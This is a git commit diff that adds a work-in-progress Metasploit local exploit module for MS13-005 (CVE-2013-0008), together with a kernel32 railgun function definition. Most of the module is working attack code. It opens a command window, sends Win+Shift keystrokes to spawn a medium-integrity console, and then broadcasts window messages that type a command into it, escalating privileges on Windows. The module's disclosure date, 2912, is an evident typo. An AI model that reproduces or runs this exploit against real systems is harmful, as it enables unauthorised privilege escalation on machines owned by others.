Initial working
parent
0e350a1211
commit
0235e6803d
|
@ -12,6 +12,8 @@ class Def_kernel32
|
|||
def self.create_dll(dll_path = 'kernel32')
|
||||
dll = DLL.new(dll_path, ApiConstants.manager)
|
||||
|
||||
dll.add_function( 'GetConsoleWindow', 'LPVOID',[])
|
||||
|
||||
dll.add_function( 'ActivateActCtx', 'BOOL',[
|
||||
["HANDLE","hActCtx","inout"],
|
||||
["PBLOB","lpCookie","out"],
|
||||
|
|
|
@ -0,0 +1,105 @@
|
|||
##
|
||||
# ## This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation',
|
||||
'Description' => %q{
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
|
||||
'Tavis Ormandy', #Discovery
|
||||
'Axel Souchet' #@0vercl0k POC
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate'=> "Nov 27 2912"
|
||||
# References CVE-2013-0008
|
||||
))
|
||||
end
|
||||
|
||||
def win_shift(number)
|
||||
vk = 0x30 + number
|
||||
bscan = 0x81 + number
|
||||
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
|
||||
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
|
||||
client.railgun.user32.keybd_event(vk, bscan, 0, 0)
|
||||
|
||||
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
|
||||
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
|
||||
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
|
||||
end
|
||||
|
||||
def count_cmd_procs
|
||||
count = 0
|
||||
client.sys.process.each_process do |proc|
|
||||
if proc['name'] == 'cmd.exe'
|
||||
count += 1
|
||||
end
|
||||
end
|
||||
puts count
|
||||
|
||||
return count
|
||||
end
|
||||
|
||||
# Run Method for when run command is issued
|
||||
def exploit
|
||||
@payload_name = datastore['PAYLOAD']
|
||||
@payload_arch = framework.payloads.create(@payload_name).arch
|
||||
|
||||
# syinfo is only on meterpreter sessions
|
||||
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||
hwin = client.railgun.kernel32.GetConsoleWindow()['return']
|
||||
if hwin == nil
|
||||
hwin = client.railgun.user32.GetForegroundWindow()['return']
|
||||
end
|
||||
puts client.railgun.user32.ShowWindow(hwin, 0)
|
||||
puts client.railgun.user32.ShowWindowAsync(hwin, 5)
|
||||
# Spawn low integrity cmd.exe
|
||||
li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid
|
||||
|
||||
count = count_cmd_procs
|
||||
# Win+Shift+?
|
||||
number = 0
|
||||
begin # Ruby DoWhile!
|
||||
i = (9 - number)
|
||||
win_shift(number)
|
||||
number += 1
|
||||
sleep(1)
|
||||
end while count_cmd_procs == count and number <= 9
|
||||
print_status "Spawned!!!"
|
||||
|
||||
client.sys.process.kill(li_cmd_pid)
|
||||
payload = "calc.exe"
|
||||
hwnd_broadcast = 0xffff
|
||||
wm_char = 0x0102
|
||||
payload.each_char do |c|
|
||||
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0)
|
||||
end
|
||||
|
||||
client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0)
|
||||
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue